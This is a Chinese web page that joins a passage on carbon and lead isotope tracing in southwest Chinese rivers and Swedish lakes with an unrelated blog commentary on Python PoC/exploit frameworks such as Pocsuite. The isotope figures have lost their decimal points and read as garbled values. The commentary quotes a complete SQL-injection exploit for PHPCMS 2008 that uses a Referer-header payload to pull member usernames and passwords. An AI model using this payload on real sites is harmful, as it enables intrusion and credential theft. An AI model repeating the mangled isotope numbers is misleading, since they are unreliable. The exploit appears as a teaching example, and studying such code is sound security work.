区域河流水系物质

区域河流水系物质,第1张

河流不仅是全球水循环的通道,也是连接陆地和海洋碳循环的通道(Degens等,1991)。通过河流水体中物质来源的示踪研究,可以查明生态系统中元素迁移、转化、累积的途径和规律。

刘丛强等(2007)研究了西南地区乌江和沅江水系PIC(颗粒无机碳)、POC(颗粒有机碳)的碳同位素组成。

乌江、舞阳河和清水江在枯水期δ13CPIC值范围分别是-96‰~04‰、-43‰~07‰和-63‰~00‰;而丰水期相应的值分别是-81‰~-10‰、-88‰~-50‰和-185‰~39‰。乌江和舞阳河枯水期PIC的δ13C的值分别是(-21±19)‰(n=34)和(-23±12)‰(n=6),而清水江较低,相应的值为(-42±22)‰(n=8)。在丰水期,乌江、舞阳河和清水江的δ13C值都比较低,分别是(-29±19)‰(n=31)(-64±21)‰(n=3)(-99±59)‰(n=6)。

枯水期乌江、舞阳河和清水江δ13CPOC值范围分别是-306‰~-249‰、-2769‰~-247‰和-262‰~-233‰,而丰水期分别相应为-286‰~-244‰、-277‰~-245‰和-276‰~-242‰,枯水期乌江和舞阳河的平均δ13CPOC值分别是(-272±13)‰(n=21)和(-265±16)‰(n=3),低于清水江(-249±15)‰(n=4)。在丰水期,乌江平均δ13CPOC值为(-258±11)‰(n=31),高于清水江的均值(-260±15)‰(n=8)。

1POC来源

在枯水期,水中生物几乎无光合作用,土壤是主要POC的来源。乌江的δ13CPOC均值为-272‰,与陆地C3植物的δ13C接近(-285‰)。用POC的平均值进行简单的同位素质量平衡计算表明陆地C3植物(POC)对乌江、舞阳河和清水江的贡献分别是91%、86%和76%左右。

丰水期,乌江δ13CPOC相对富重同位素(-258‰)。夏季丰水期乌江悬浮物含量高,影响光的穿透性,水体生产力应该很低,水体生物作用对POC的贡献可以忽略。从冬季到夏季δ13CPOC值升高了14‰,方差分析表明C4植物对POC的贡献增加了9%。另外,从RPOC和Δδ13CPOC(丰水期和枯水期δ13C的差值)之间的相关分析,显示POC浓度的上升伴随着δ13CPOC值的增大,说明干枯河岸区遭受强烈的土壤侵蚀。

丰水期舞阳河的δ13CPOC平均值接近枯水期,表明陆地和水生植物对POC的贡献都相当重要。分析夏季POC的C/N比值(<10)表明水生生物贡献了相当多的POC。

丰水期清水江的δ13CPOC均值比枯水期低11‰,丰水期大部分样品的碳同位素组成低于枯水期。夏季丰水期清水江河水清澈,表明存在相当强度的光合作用,水生植物对POC的贡献不可忽略。夏季POC的C/N比值大部分都小于10,说明水生植物贡献了相当多的颗粒有机质,结合POC浓度伴随着δ13CPOC值的变化规律,清水江丰水期的δ13CPOC值降低应归因于水生C3植物的贡献。

2PIC来源

枯水期所有乌江样品的δ13CPIC值都比母岩(+15‰)低,除两个样品外,其余样品全是负值。尽管冬季枯水期PIC碳同位素组成较高但都是负值,表明相当多的PIC是来自土壤中自生的碳酸盐或河流中沉淀的碳酸盐。夏季丰水期,所有样品的δ13CPIC值都是负值,并比母岩(+15‰)低很多,表明土壤碳酸盐或者河流内部沉淀的碳酸盐的贡献更加突出。

舞阳河的情形与乌江相似,从冬季(-23)到夏季(-64‰)PIC碳同位素组成降低了41。表明丰水期,土壤碳酸盐或河流沉淀的碳酸盐是PIC的主要提供者。

清水江冬季枯水期的δ13CPIC值为-42‰,夏季丰水期,δ13CPIC值为-99‰,说明碳酸盐的贡献越来越大,母岩碎屑的贡献越来越少。

Renberg等(2002)研究过瑞典31个湖泊沉积物的铅同位素组成,未被铅污染的湖泊沉积物有高的206Pb/207Pb比值(128‰~201,平均152±018),相反来自金属冶炼、燃煤及汽油添加剂的铅比值较低(<12)。当有污染源铅沉积时,沉积物的铅同位素206Pb/207Pb比值就会下降。因此,沉积物铅同位素组成记录着瑞典湖泊的铅污染历史。公元0年有一个峰值,公元1000年开始,铅的污染大规模、持久性增加,至公元1200~1530年达到了高峰,自二次世界大战开始又急剧升高,到20世纪70年代达到顶峰,随后逐步下降至今,显示出随着污染铅的增加,相应的206Pb/207Pb比值持续下降(图16-12)。

图16-12 Koltjarn湖不同时期沉积物总铅浓度、206Pb/207Pb值和计算的污染铅浓度(据Renberg等,2002)

然后来谈谈自己的看法:
其实吧,无论乌云的Tangscan也好,知道创宇的Pocsuite也好,还有Beebeeto也好(Bugscan没写过,不是特别了解不过应该差不多),关于Web的Poc和Exp,都极度依赖于两个Python库。
1 Requests : 模拟Web的请求和响应等交互动作。
2 Re : 正则表达式,用来验证返回的结果是否符合漏洞的预期,从而验证漏洞是否存在。
其余的大部分代码都是漏洞的信息。
Pocsuite官方文档例子:
#!/usr/bin/env python
# coding: utf-8
import re
import urlparse
from t import req
from pocsuitepoc import POCBase, Output
from pocsuiteutils import register
class TestPOC(POCBase):
vulID = '62274' # ssvid
version = '1'
author = ['MediciYan']
vulDate = '2011-11-21'
createDate = '2015-09-23'
updateDate = '2015-09-23'
references = ['']
name = '_62274_phpcms_2008_place_sql_inj_PoC'
appPowerLink = ''
appName = 'PHPCMS'
appVersion = '2008'
vulType = 'SQL Injection'
desc = '''
phpcms 2008 中广告模块,存在参数过滤不严,
导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,
如果关闭了错误显示,可以采用基于时间和错误的盲注
'''
samples = ['']
def _attack(self):
result = {}
vulurl = urlparseurljoin(selfurl, '/data/jsphpid=1')
payload = "1', (SELECT 1 FROM (select count(),concat(floor(rand(0)2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schematables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = reqget(vulurl, headers=head)
if respstatus_code == 200:
match_result = research(r'Duplicate entry \'1--(+)---(+)--\' for key', respcontent, reI | reM)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_resultgroup(1)
result['AdminInfo']['Password'] = match_resultgroup(2)
return selfparse_attack(result)
def _verify(self):
result = {}
vulurl = urlparseurljoin(selfurl, '/data/jsphpid=1')
payload = "1', (SELECT 1 FROM (select count(),concat(floor(rand(0)2), md5(1))a from information_schematables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = reqget(vulurl, headers=head)
if respstatus_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in respcontent:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload
return selfparse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
outputsuccess(result)
else:
outputfail('Internet nothing returned')
return output
register(TestPOC)
可以看到从代码11到28行都是漏洞的一些信息,真正的功能函数只有_attack和_verify两个而已。甚至这个例子有点繁琐了,现在大大们都是把exploit写在verify里面,所以真正起到功能的,也就不到十行的代码。pocsuitenet 这个库其实就是Requests。用Requests模拟手工注入的Post提交,用正则匹配提取和验证必要信息,简单说起来就是这两个步骤。
这么一来你再看看其他的由Python写的Poc和Exp就大同小异了。Poc/Exp总的说来就只是用程序代替手工的过程而已,所以了解了漏洞的原理和认证方法之后就简单了。
代码很简单最主要的,还是对于漏洞的理解。
先说到这里,有空之后再写一些别的。


欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/zz/10733768.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-10
下一篇 2023-05-10

发表评论

登录后才能评论

评论列表(0条)

保存